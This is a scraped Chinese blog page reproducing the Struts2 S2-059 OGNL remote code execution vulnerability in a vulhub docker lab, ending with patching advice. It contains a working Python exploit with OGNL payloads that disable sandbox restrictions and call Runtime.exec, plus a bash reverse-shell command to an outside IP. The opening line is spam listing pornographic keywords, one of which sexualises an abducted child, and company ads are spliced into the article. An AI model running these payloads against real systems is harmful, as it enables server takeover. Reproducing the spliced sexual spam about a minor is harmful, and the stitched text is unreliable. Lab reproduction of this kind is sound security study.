bl双性强迫侵犯h_国产在线观看人成激情视频_蜜芽188_被诱拐的少孩全彩啪啪漫画

Struts2S2-059遠程代碼執(zhí)行漏洞復現(xiàn)是怎么樣的

今天就跟大家聊聊有關(guān)Struts2 S2-059 遠程代碼執(zhí)行漏洞復現(xiàn)是怎么樣的,可能很多人都不太了解,為了讓大家更加了解,小編給大家總結(jié)了以下內(nèi)容,希望大家根據(jù)這篇文章可以有所收獲。

公司主營業(yè)務:成都做網(wǎng)站、成都網(wǎng)站設(shè)計、移動網(wǎng)站開發(fā)等業(yè)務。幫助企業(yè)客戶真正實現(xiàn)互聯(lián)網(wǎng)宣傳,提高企業(yè)的競爭能力。成都創(chuàng)新互聯(lián)是一支青春激揚、勤奮敬業(yè)、活力青春激揚、勤奮敬業(yè)、活力澎湃、和諧高效的團隊。公司秉承以“開放、自由、嚴謹、自律”為核心的企業(yè)文化,感謝他們對我們的高要求,感謝他們從不同領(lǐng)域給我們帶來的挑戰(zhàn),讓我們激情的團隊有機會用頭腦與智慧不斷的給客戶帶來驚喜。成都創(chuàng)新互聯(lián)推出五河免費做網(wǎng)站回饋大家。

0x00簡介

Struts2 是 Apache 軟件組織推出的一個相當強大的 Java Web 開源框架,本質(zhì)上相當于一個 servlet。Struts2 基于 MVC 架構(gòu),框架結(jié)構(gòu)清晰。通常作為控制器(Controller)來建立模型與視圖的數(shù)據(jù)交互,用于創(chuàng)建企業(yè)級 Java web 應用程序,它利用并延伸了Java Servlet API,鼓勵開發(fā)者采用MVC架構(gòu)。Struts2以WebWork優(yōu)秀的設(shè)計思想為核心,吸收了Struts框架的部分優(yōu)點,提供了一個更加整潔的MVC設(shè)計模式實現(xiàn)的Web應用程序框架。

0x01漏洞概述

攻擊者可以通過構(gòu)造惡意的OGNL表達式,并將其設(shè)置到可被外部輸入進行修改,且會執(zhí)行OGNL表達式的Struts2標簽的屬性值,引發(fā)OGNL表達式解析,最終造成遠程代碼執(zhí)行的影響。

0x02影響范圍

Struts 2.0.0 – Struts 2.5.20

0x03環(huán)境搭建

1.本次漏洞環(huán)境使用vulhub快速搭建,vulhub下載地址如下:

https://github.com/vulhub/vulhub

cd vulhub-master/struts2/s2-059

Struts2 S2-059 遠程代碼執(zhí)行漏洞復現(xiàn)是怎么樣的

2.使用docker-compose快速構(gòu)建靶場環(huán)境

docker-compose up -d

Struts2 S2-059 遠程代碼執(zhí)行漏洞復現(xiàn)是怎么樣的

3.啟動完成后在瀏覽器訪問http://ip:8080/?id=1 就可以看到測試界面

Struts2 S2-059 遠程代碼執(zhí)行漏洞復現(xiàn)是怎么樣的

0x04漏洞復現(xiàn)

1.在瀏覽器訪問http://ip:8080/?id=%25{88*88},可以發(fā)現(xiàn)執(zhí)行的88*88成功被解析了,會執(zhí)行OGNL表達式的Struts2標簽的屬性值,引發(fā)OGNL表達式解析。

Struts2 S2-059 遠程代碼執(zhí)行漏洞復現(xiàn)是怎么樣的

2.使用poc來反彈shell,反彈shell的payload需要使用base64編碼

bash -i >& /dev/tcp/172.16.1.132/9967 0>&1

base64編碼網(wǎng)址:

http://www.jackson-t.ca/runtime-exec-payloads.html

Struts2 S2-059 遠程代碼執(zhí)行漏洞復現(xiàn)是怎么樣的

import requests

url = "http://127.0.0.1:8080"

data1 = {

"id": "%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))}"

}

data2 = {

"id": "%{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec('payload-base64編碼'))}"

}

res1 = requests.post(url, data=data1)

res2 = requests.post(url, data=data2)

3.修改poc中的payload為自己的payload,然后使用python運行,可以看到反彈了shell

Struts2 S2-059 遠程代碼執(zhí)行漏洞復現(xiàn)是怎么樣的

Struts2 S2-059 遠程代碼執(zhí)行漏洞復現(xiàn)是怎么樣的

0x05修復建議

1.升級到Struts 2.5.22或更高版本

2. 開啟ONGL表達式注入保護措施。

https://struts.apache.org/security/#proactively-protect-from-ognl-expression-injections-attacks-if-easily-applicable

看完上述內(nèi)容,你們對Struts2 S2-059 遠程代碼執(zhí)行漏洞復現(xiàn)是怎么樣的有進一步的了解嗎?如果還想了解更多知識或者相關(guān)內(nèi)容,請關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道,感謝大家的支持。

分享名稱:Struts2S2-059遠程代碼執(zhí)行漏洞復現(xiàn)是怎么樣的
當前URL:http://vcdvsql.cn/article12/pdeggc.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供服務器托管移動網(wǎng)站建設(shè)網(wǎng)站營銷全網(wǎng)營銷推廣域名注冊定制網(wǎng)站

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)

成都做網(wǎng)站